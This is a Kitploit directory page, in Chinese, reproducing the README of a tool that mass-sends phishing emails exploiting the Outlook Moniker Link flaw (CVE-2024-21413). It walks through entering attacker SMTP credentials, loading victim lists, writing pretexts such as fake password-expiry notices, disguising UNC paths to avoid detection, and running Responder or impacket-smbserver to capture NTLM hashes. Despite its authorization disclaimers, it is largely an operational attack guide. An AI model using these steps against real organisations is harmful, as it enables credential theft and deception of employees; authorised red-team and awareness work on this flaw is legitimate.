Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Blind-Trust-CVE-2024-21413-Research — 一个用于模拟针对性钓鱼活动的安全研究工具,利用CVE-2024-21413 (Moniker Link)。 | Kitploit
工具/GitHubGitHub/h1ssbl1tz/blind-trust-cve-2024-21413-research
钓鱼工具漏洞分析漏洞利用钓鱼攻击渗透测试社会工程学学习与教育红队电子邮件安全实验室与实践

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
GitHubh1ssbl1tz/blind-trust-cve-2024-21413-research

Blind-Trust-CVE-2024-21413-Research

一个用于模拟针对性钓鱼活动的安全研究工具,利用CVE-2024-21413 (Moniker Link)。

查看仓库
52个月前尚未审核

BLIND TRUST - Moniker链接钓鱼活动框架

一个用于利用CVE-2024-21413 Moniker链接漏洞模拟定向钓鱼活动的安全研究工具。专为授权的红队行动、渗透测试和安全意识培训设计。

概览

BLIND TRUST 是一个钓鱼活动框架,帮助安全团队了解和测试其对复杂电子邮件攻击的防御能力。它利用Moniker链接技术绕过Outlook的受保护视图,提供逼真的攻击模拟,组织可借此加强安全态势。

该工具自动完成端到端的活动工作流——从配置到电子邮件投递——同时通过可定制的UNC路径和灵活的话术选项维持操作安全性。

目的

组织需要了解真实的攻击技术才能有效防御。TRUST 支持:

  • 红队行动 - 在安全评估中开展授权的钓鱼活动
  • 安全意识培训 - 向员工展示真实世界的攻击向量
  • 漏洞验证 - 针对已知技术测试检测能力
  • 防御研究 - 了解Moniker链接在您环境中的行为

特性

  • 多目标活动 - 单次配置即可向多个目标发送钓鱼邮件
  • 灵活目标加载 - 通过交互式输入或词表格式的.txt文件加载目标
  • 可定制话术 - 控制邮件主题、发件人显示名称和正文文本
  • 隐蔽的UNC路径 - 自定义Moniker链接路径以显得真实(域、共享名、漏洞利用名)
  • SMTP认证 - 支持多种SMTP服务器及TLS协商
  • 自动重试逻辑 - 针对临时SMTP故障采用指数退避
  • 活动报告 - 每个目标的投递状态及汇总结果
  • 无硬编码签名 - 消除暴露该技术的明显指标

安装

要求

  • Python 3.7+
  • 仅标准库(无外部依赖)

设置

root@kitploit:~
# 克隆仓库
git clone https://github.com/h1ssbl1tz/Blind-Trust.git
cd TRUST

# 运行工具
python3 TRUST_v7.py

要求

该工具仅使用Python标准库模块:

root@kitploit:~
getpass      - 安全密码输入
html         - HTML转义
ipaddress    - IP地址验证
logging      - 结构化日志
os           - 文件操作
re           - 正则表达式
signal       - 信号处理
smtplib      - SMTP邮件协议
sys          - 系统工具
time         - 时间操作
dataclasses  - 配置建模
email        - MIME邮件构建
typing       - 类型提示

无需外部包——可在任何Python 3.7+环境中运行。

快速开始

root@kitploit:~
python3 TRUST_v7.py

按照交互式向导完成5个步骤:

  1. 攻击者凭据 - 用于发送邮件的SMTP账户
  2. SMB监听器设置 - 目标将连接的IP地址
  3. 目标配置 - 从输入或词表文件加载受害者
  4. 邮件自定义 - 主题、发件人名称和正文文本
  5. 载荷自定义 - UNC路径主机、共享名和漏洞利用名

使用示例

示例1:交互式输入(小型活动)

root@kitploit:~
Load targets from [f]ile or [i]nput directly?: i
Target email address(es): [email protected], [email protected]

Email subject [Security Update Required]: Urgent: Password Expiration Notice
Display name (From field) [Microsoft Security Center]: IT Security Team
Email body text: Your password expires in 24 hours. Please update immediately.

UNC host (IP or domain) [192.168.1.100]: it-internal.company.com
UNC share name [updates]: patches
UNC exploit name [patch]: kb_security_2024

示例2:词表加载(大型活动)

创建targets.txt:

root@kitploit:~
# Finance Department
[email protected]
[email protected]
[email protected]

# Accounting
[email protected]
[email protected]

然后运行:

root@kitploit:~
Load targets from [f]ile or [i]nput directly?: f
Path to targets file: targets.txt
[+] Loaded 5 target(s) from targets.txt

示例3:逼真的财务话术

root@kitploit:~
Email subject: Q3 Financial Review - Action Required
Display name: Finance Operations Team
Email body: Please review the attached Q3 financial statement and provide approval.

UNC host: finance-internal.company.com
UNC share: quarterly
UNC exploit: q3_financial_report

Generated UNC path: file://finance-internal.company.com/quarterly!q3_financial_report

配置说明

步骤1:攻击者凭据

  • 攻击者邮箱:用于发送钓鱼邮件的邮箱地址(通常是被盗或伪造的账户)
  • SMTP密码:邮件服务器的认证凭据

步骤2:SMB监听器

  • SMB监听器IP:您的SMB监听器(如Responder、impacket-smbserver)运行的IP地址。目标点击Moniker链接后会尝试连接此地址。

步骤3:目标配置

两种选项:

  • 交互式输入:直接粘贴邮箱(逗号或换行分隔)
  • 词表文件:从.txt文件加载,每行一个邮箱,以#开头的注释行

步骤4:邮件自定义

  • 主题:邮件主题行(避免CVE引用;保持业务化)
  • 发件人显示名称:邮件头中显示的友好名称
  • 邮件正文:解释目标为何应点击链接的话术文本

步骤5:载荷自定义

这是避免明显签名的关键:

  • UNC主机:使用真实的域名或子域名(如finance-internal.company.com)而非仅IP
  • UNC共享:真实的共享名,如quarterly、updates、documents
  • UNC漏洞利用:真实的文件名,如q3_report、security_patch、training_document

结果:不再是明显的\\192.168.1.100\share!exploit,而是类似file://finance-internal.company.com/quarterly!q3_report。

执行流程

root@kitploit:~
Start
  ↓
[步骤1] 提示输入攻击者邮箱和SMTP密码
  ↓
[步骤2] 提示输入SMB监听器IP
  ↓
[步骤3] 加载目标邮箱(文件或输入)
  ↓
     ↓→ 对每个目标:
     │  - 验证邮箱格式
     │  - 检查重复
     │
[步骤4] 提示输入邮件话术
     │  - 主题、发件人名称、正文文本
     │
[步骤5] 提示输入UNC路径自定义
     │  - 主机、共享名、漏洞利用名
     │
  ↓
[构建] 构造配置对象
  ↓
[验证] 检查所有字段是否完整有效
  ↓
[摘要] 显示发送前摘要以供审核
  ↓
[确认] 用户批准或取消
  ↓
[发送] 对每个目标:
     │  - 构建带有自定义Moniker链接的MIME邮件
     │  - 尝试SMTP投递,带重试逻辑
     │  - 记录每个目标的成功/失败
     │
  ↓
[报告] 显示活动结果(已投递 vs 失败)
  ↓
Exit

工作原理

漏洞

CVE-2024-21413(Moniker链接)是一个Outlook漏洞,允许嵌入包含!字符的file:// URL。当用户点击此类链接时,Outlook会尝试访问UNC路径,即使在受保护视图模式下也会触发NTLM认证尝试。

攻击流程

  1. 用户收到一封包含Moniker链接的邮件
  2. 邮件看起来合法(得益于您自定义的话术)
  3. 用户点击链接
  4. Outlook尝试访问\\host\share!exploit
  5. !字符绕过受保护视图
  6. 用户系统向您的SMB监听器进行认证
  7. 您捕获NTLM哈希或凭据信息

本工具的功能

TRUST 自动化投递阶段:

  • 使用自定义话术构建逼真的邮件
  • 将Moniker链接注入HTML载荷
  • 管理SMTP连接和重试
  • 高效处理多目标
  • 提供活动报告

故障排除

问题:"SMTP attempt 3 failed: [SMTP: 535]"

解决方案:验证SMTP凭据。对于Gmail,使用应用专用密码。对于企业邮箱,联系您的SMTP管理员。

问题:"TLS not supported. Proceeding without encryption."

解决方案:某些SMTP服务器正常。连接将在无TLS加密的情况下进行。

问题:"Invalid email: victim@"

解决方案:确保词表文件中的邮箱完整且格式有效([email protected])。

问题:"Recipient rejected"

解决方案:目标服务器上不存在该邮箱地址,或服务器阻止从您账户的中继。

问题:"File not found: targets.txt"

解决方案:验证文件路径正确且文件存在于当前目录。

常见问题

问:使用此工具合法吗? 答:仅当您有被测试组织的明确书面授权时才合法。未经授权的钓鱼行为是违法的。始终持有书面的工作范围和交战规则。

问:能否绕过高级邮件过滤器? 答:这是一个逼真的模拟,但现代邮件安全仍可能识别。这正是关键——如果您组织的过滤器无法拦截此类攻击,则存在需要解决的问题。

问:为什么要自定义UNC路径? 答:原始的\\IP\share!exploit是明显的暴露标志。真正的攻击者使用逼真的路径。您的安全团队应能同时捕获明显和细微的指标。

问:能否用于培训员工? 答:可以。在授权测试后,可在安全意识培训中使用脱敏后的活动示例,向员工展示真实的攻击技术。

问:此工具会捕获凭据吗? 答:不会。TRUST仅负责投递邮件。您需要单独的SMB监听器(Responder、impacket-smbserver等)来在目标点击链接时捕获NTLM哈希。

问:如何设置SMB监听器? 答:在Linux上使用Responder或impacket-smbserver:

root@kitploit:~
# Responder(捕获哈希)
sudo responder -i eth0 -v

# impacket-smbserver(文件服务器模拟)
impacket-smbserver Share /tmp -smb2support

局限性

  • 无内置凭据捕获:您提供SMB监听器;TRUST仅投递邮件
  • 无活动持久化:结果打印到控制台;重定向stdout可保存
  • 无目标情报:您需自行收集目标邮箱地址
  • 无邮件混淆:虽然UNC路径可自定义,但邮件头为标准SMTP
  • 无多线程:为可靠性顺序发送邮件

免责声明

此工具仅用于授权安全测试。

  • 您必须拥有明确的书面许可才能进行钓鱼活动
  • 未经授权使用是非法且不道德的
  • 仅在您拥有或有权测试的受控环境中使用
  • 始终遵守适用法律法规
  • 作者不对因使用此工具造成的滥用或损害承担任何责任

使用TRUST即表示您确认了解法律后果并已获得适当授权。

负责任使用建议

  1. 获取书面授权 - 在任何活动前签署交战规则
  2. 划定目标范围 - 确定哪些系统和人员属于范围
  3. 计划补救措施 - 为被钓鱼员工准备好培训计划
  4. 记录结果 - 详细保存评估记录
  5. 报告发现 - 向利益相关者反馈哪些有效
  6. 尊重隐私 - 不在安全计划之外使用捕获的数据

未来改进

  • 活动持久化和文件日志
  • 邮件话术模板系统
  • 集成LDAP进行目标枚举
  • HTML模板渲染以制作更复杂的邮件
  • 活动排程(基于时间的投递)
  • 报告面板,包含指标和分析
  • 支持除Moniker链接之外的其他钓鱼技术

许可证

本项目采用MIT许可证发布,并附加使用限制。详见LICENSE。

致谢与归属

本项目基于并受灵感来自于CMNatic (https://github.com/cmnatic) 的原始CVE-2024-21413研究和实现。

CMNatic应获得全部荣誉:

  • 原始漏洞研究和概念验证
  • 核心技术实现
  • 初始公开文档

本仓库代表对该工作的修改和扩展版本,增强功能包括:

  • 多目标活动支持
  • 可定制的邮件话术
  • 隐蔽的UNC路径自定义
  • 基于词表的目标加载
  • 改进的SMTP处理和重试逻辑
  • 全面的文档

详见CREDITS.md。

作者

H1SS - 为此版本进行扩展和维护,用于安全研究和授权测试。

贡献

欢迎贡献。请确保任何更改:

  • 保持工具的教育导向
  • 包含适当的文档
  • 遵循负责任披露实践
  • 不引入外部依赖

参见CONTRIBUTING.md。

支持

如有问题、疑问或建议,请在GitHub上提交issue。


记住:此工具是一个研究项目。请负责任、合法、合乎道德地使用。

下载工具